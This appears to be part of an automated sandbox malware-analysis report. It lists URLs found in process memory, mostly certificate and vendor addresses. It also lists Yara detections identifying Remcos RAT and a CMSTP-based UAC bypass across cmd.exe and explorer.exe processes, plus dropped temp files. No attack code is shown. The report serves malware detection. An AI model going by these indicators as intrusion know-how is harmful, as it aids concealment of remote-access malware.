                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                      Source: svchost.exe, 00000015.00000003.2438441779.000002061F000000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp, DZIPR.exe.17.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2343454264.000000000348B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp, DZIPR.exe.17.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                      Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                      Source: DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.drString found in binary or memory: http://support.datanumen.com
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                      Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                      Source: DZIPR.exe, 00000011.00000002.2343813669.0000000003588000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EB5000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.00000000057CD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004DEB000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.0000000004982000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004D5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                      Source: DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.drString found in binary or memory: http://www.repairfile.com
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2343454264.000000000348B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                      Source: svchost.exe, 00000015.00000003.2438441779.000002061F05E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                      Source: svchost.exe, 00000015.00000003.2438441779.000002061F000000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                      Source: DZIPR.exe.17.drString found in binary or memory: https://www.datanumen.com/%https://www.datanumen.com/zip-repair/
                      Source: DZIPR.exe.17.drString found in binary or memory: https://www.datanumen.com/contact/0https://www.datanumen.com/update/dzipr/dzipr.inf
                      Source: DZIPR.exe.17.drString found in binary or memory: https://www.datanumen.com/support/
                      Source: DZIPR.exe.17.drString found in binary or memory: https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htm
                      Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.drString found in binary or memory: https://www.datanumen.com/zip-repair/
                      Source: DZIPR.exe, 00000011.00000002.2343454264.000000000348B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.c
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA504EE GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,17_2_6FA504EE
                      Source: Yara matchFile source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED

                      E-Banking Fraud

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 24.2.cmd.exe.5862757.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.cmd.exe.5861b57.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 26.2.explorer.exe.4e80757.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 17.2.DZIPR.exe.362a9ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 26.2.explorer.exe.4e7fb57.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.cmd.exe.581ca8a.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 17.2.DZIPR.exe.362b5ce.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 30.2.explorer.exe.4ee7a8a.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
